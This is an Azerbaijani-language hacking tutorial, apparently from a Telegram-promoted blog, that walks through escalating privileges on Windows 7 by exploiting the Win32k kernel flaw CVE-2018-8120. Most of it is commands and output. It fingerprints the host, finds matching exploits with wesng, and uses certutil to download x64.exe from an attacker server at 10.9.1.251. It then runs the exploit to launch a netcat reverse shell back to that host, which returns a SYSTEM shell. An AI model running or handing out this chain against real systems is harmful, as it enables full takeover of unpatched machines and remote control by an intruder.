Windows mühitində işləyərkən Nüvəsinin exploit edilərək PrivEsc necə həyata keçirilir?Windows Nüvəsinin exploit edilməsi necə həyata keçirilir?Windows Nüvəsi Exploit nədir? Windows Kernel nüvəsinin exploit edilməsi nədir?Win32k Elevation of Privilege Vulnerability.
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Windows Nüvəsinin Exploitləri
Biz əvvəlki paylaşımlardan bildiyimiz kimi Nüvə (kernel) – bu əməliyyat sisteminin ürəyi hesab edə bilərik.Əgər siz nüvəni,yəni kerneli exploit edə biliriksə deməli həmin ƏS (Windows və ya Linux) üzərində bütün səlahiyyətlərə sahib ola bilərik.Bu əməliyyatı yerinə yetirmək üçün Linux ƏS üzərində istifadə etdiyimiz metod ilə həyata keçirəcəyik:
- ƏS versiyasını öyrənmək.
- Versiyaya uyğun exploitin tapılması
- Yazma icazəmiz olan qovluğa exploitin daşınması
- Exploiti icra etmək və ƏS-də SYSTEM olmaqdan həzz almaq.
ƏS versiyasını öyrənmək
Bu mərhələdə biz hədəf olaraq Windows 7 ƏS-ə məhdud səlahiyyətli kommanda sətri ilə qoşuluruq. Buna görə systeminfo kommandası ilə hədəf ƏS haqqında məlumat əldə etməyə çalışırıq.
C:\Users\user>systeminfo | findstr OS
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
Versiyaya uyğun exploitin tapılması
Bu etapda olan məqsədimiz əldə edilən ƏS versiyasına uyğun exploitin tapılmasıdır.Daha dəqiq və düzgün exploitin tapılması üçün wesng (Windows Exploit Suggester) alətini Kali Linux cihazımızda icra edərək həmin versiyaya uyğun olan bütün exploitləri tapa bilərik.İlk öncə wes.py alətinin Github`ın github.com/bitsadmin/wesng/blob/master/wes.py reposundan əldə edə edək. Bu alətlə işləmək üçün heç bir filtr olmadan systeminfo kommandasını icra etməliyik.Həmin kommandanın nəticəsini bir mətn faylına qeyd edin məsələn sysinfo.txt. Sonda isə wes.py alətindən istifadə edərək exploitləri yoxlayaq.
┌──(root㉿kali)-[~]
└─# python wes.py --update
└─# python wes.py sysinfo.txt -i 'Elevation of Privilege' --exploits-only
Windows Exploit Suggester 1.05 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows 7 for x64-based Systems Service Pack 1
- Generation: 7
- Build: 7601
- Version: None
- Architecture: x64-based
- Installed hotfixes (3): KB2534111, KB2999226, KB976902
[+] Loading definitions
- Creation date of definitions: 20250517
[+] Determining missing patches
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20180508
CVE: CVE-2018-8120
KB: KB4103712
Title: Win32k Elevation of Privilege Vulnerability
Affected product: Windows 7 for x64-based Systems Service Pack 1
Affected component: Microsoft Graphics Component
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.exploit-db.com/exploits/45653/, https://www.exploit-db.com/exploits/45653/
Alınan nəticələrin sayı görəcəyiniz üzrə həddindən artıq çoxdur və Exploit-db-də Exploitin PoC başa düşmək isə çətindir. Bunun əvəzinə isə burada yerləşən exploiti https://github.com/SecWiki/windows-kernel-exploits adresində yerləşdiyini görə bilərik.
Bu exploit CVE-2018-8120 exploitidir və əməliyyatın davamında bu exploitdən istifadə edəcəyik.
Payloadun icra edilməsi və System shell əldə etmək
Son mərhələ olaraq bizim etməli olduğumuz exploitin Github adresində yerləşən x64.exe faylını yükləmək və hədəf ƏS olan Windowsa yerləşdirməkdir. Bunun üçün exploiti Kali cihazıma yüklədim və python ilə veb server başlatdım və Windows cihazdan əvvəlki paylaşımlarda öyrəndiyimiz kommanda olan certutil.exe istifadə edərək x64.exe faylını endirdim.
C:\Users\user>certutil.exe -split -urlcache -f http://10.9.1.251/x64.exe
**** Online ****
000000 ...
017000
CertUtil: -URLCache command completed successfully.
İndi isə hədəfdən shell almağa hazırıq, Kali cihazımıda natcat alətindən istifadə edərək listerner yaradırıq.
┌──(root㉿kali)-[~]
└─# nc -nvlp 4444
listening on [any] 4444 ...
Hədəf Windows cihazında x64.exe exploitindən istifadə edərək bizim netcat alətində qurduğumuz 4444 portunda daxil olmağa çalışaq.
C:\Users\user>x64.exe "nc.exe -nv 10.9.1.251 4444 -e cmd.exe"
CVE-2018-8120 exploit by @unamer(https://github.com/unamer)
[+] Get manager at fffff900c22e42b0,worker at fffff900c22bac90
[+] Triggering vulnerability...
[+] Overwriting...fffff80002bfec68
[+] Elevating privilege...
[+] Cleaning up...
[+] Trying to execute nc.exe -nv 10.9.1.251 4444 -e cmd.exe as SYSTEM...
[+] Process created with pid 2856!
Bu əməliyyatın yerinə yetirmək üçün əvvəlcədən hədəf cihazda netcat alətini Windows üçün olan versiyası olmalıdır.Onuda exploiti daşıdımız üsulla yerləşdirmək mümkündür.
Kali cihazımıza geri qayıtdığımızda yüksək səlahiyyətli SYSTEM istifadəçi ilə qoşulduğumuz görə bilərik.
┌──(root㉿kali)-[~]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.9.1.251] from (UNKNOWN) [10.10.103.124] 49277
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user>whoami
whoami
nt authority\system
Bu üsulla bağlı metasploit ilə necə yerinə yetirildiyini gələcək paylaşımda görə bilərsiniz.
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat